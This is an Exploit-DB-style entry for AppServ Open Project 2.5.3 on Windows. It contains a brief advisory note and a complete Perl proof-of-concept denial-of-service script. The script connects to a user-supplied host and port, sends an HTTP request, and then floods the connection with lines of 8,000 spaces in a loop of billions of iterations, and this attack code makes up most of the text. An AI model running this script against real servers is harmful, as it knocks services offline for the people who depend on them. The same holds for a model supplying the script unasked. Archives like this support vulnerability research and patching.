AppServ Open Project 2.5.3 - Remote Denial of Service

EDB-ID:

26816


Author:

Rozor

Type:

dos


Platform:

Windows

Date:

2005-12-14


source: https://www.securityfocus.com/bid/15851/info

AppServ Open Project is reportedly affected by a remote denial of service vulnerability.

AppServ 2.5.3 running on Microsoft Windows platforms was reported to be vulnerable. Other versions may be affected as well. 

#Xploit PoC AppServ 2.5.3 "Win32" DoS \\ (0x001)
#appserv-dos.pl
#!C:\Perl\perl.exe
#C:\>perl appserv-dos.pl <tested ip> <port>
#By Rozor - !Sub_Level Security Investigation
#Thank To Miseo
#Tested In LocalHost.

sub banner {
print("--------------------------------------------\n");
print("|                                           |\n");
print("|    Proof Of Concept AppServ 2.5.3 DoS     |\n");
print("|    C:\>appserv-dos.pl <target> <port       |\n");
print("|                                           |\n");
print("|      By Rozor - !Sub_Level Research       |\n");
print("|                                           |\n");
print("---------------------------------------------\n");
}
die banner() unless $ARGV[0];
die banner() unless $ARGV[1];

use IO::Socket::INET;

my $host = $ARGV[0];
my $port = $ARGV[1];
my $space = "\x20";
my $i;
my $l;
my $j;

for ($i=0; $i<8000; $i++)
{
$l.="\x20";
}
print "\n\nAppServ 2.5.3 DoS Proof Of Concept\n .:By Rozor:. !Sub_Level\n";
print "Attack...\n";
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort =>
$port, Proto => 'tcp') ||

die "Error: Conection reused$@\n";
my $buffer="GET / HTTP/1.0\n";
my $m = "$l\n";
send($sock,$buffer,0) || die "Error: Send not found\n";
for($l= 0; $l <8000000000; $l++)
{
print "[ $l - 8000000000 ]\r";
send($sock,$m,0) || die "Error: Send not found\n";
}
print "\nServer DoS Hack\n";
close($sock);